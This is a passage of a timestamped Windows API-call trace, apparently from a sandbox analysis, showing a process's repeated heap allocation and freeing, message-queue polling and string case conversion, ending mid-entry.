RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0258.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0258.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0258.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0258.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0258.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0258.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0258.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0258.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0258.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0258.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0258.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0258.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0258.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0258.270] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0258.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0258.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0258.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0258.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0258.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0258.271] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0258.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0258.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0258.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0258.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0258.271] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0258.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0258.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0258.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0258.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0258.272] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0258.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0258.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0258.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0258.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0258.272] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.273] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0258.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0258.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0258.273] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0258.273] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0258.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0258.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0258.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0258.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0258.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0258.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0258.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0258.274] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0258.274] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.274] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0258.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0258.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0258.274] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0258.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0258.274] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0258.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0258.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0258.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0258.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0258.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0258.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0258.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0258.275] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0258.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0258.275] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0258.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0258.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0258.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0258.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0258.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0258.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0258.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0258.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0258.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0258.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0258.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0258.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0258.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0258.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0258.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0258.276] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0258.277] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.277] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0258.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0258.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0258.277] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0258.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0258.277] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0258.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0258.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0258.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0258.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0258.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0258.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0258.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0258.278] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0258.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0258.278] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0258.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0258.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0258.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0258.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0258.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0258.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0258.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0258.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0258.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0258.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0258.279] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0258.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0258.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0258.279] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0258.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0258.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0258.279] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.279] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0258.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0258.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0258.279] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0258.280] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.280] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0258.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0258.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0258.280] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0258.280] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0258.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0258.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0258.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0258.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0258.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0258.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0258.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0258.281] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0258.281] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0258.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0258.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0258.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0258.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0258.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0258.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0258.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0258.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0258.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0258.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0258.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0258.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0258.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0258.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0258.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0258.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0258.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0258.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0258.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0258.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0258.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0258.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0258.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0258.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0258.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0258.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0258.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0258.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0258.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0258.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0258.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0258.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0258.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0258.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0258.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0258.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0258.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34c5e38 | out: hHeap=0x25c0000) returned 1 [0258.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0258.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0258.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0258.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0258.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0258.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0258.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0258.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0258.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0258.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0258.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0258.285] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0258.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0258.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0258.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0258.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0258.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0258.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0258.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0258.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0258.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0258.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0258.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0258.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0258.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 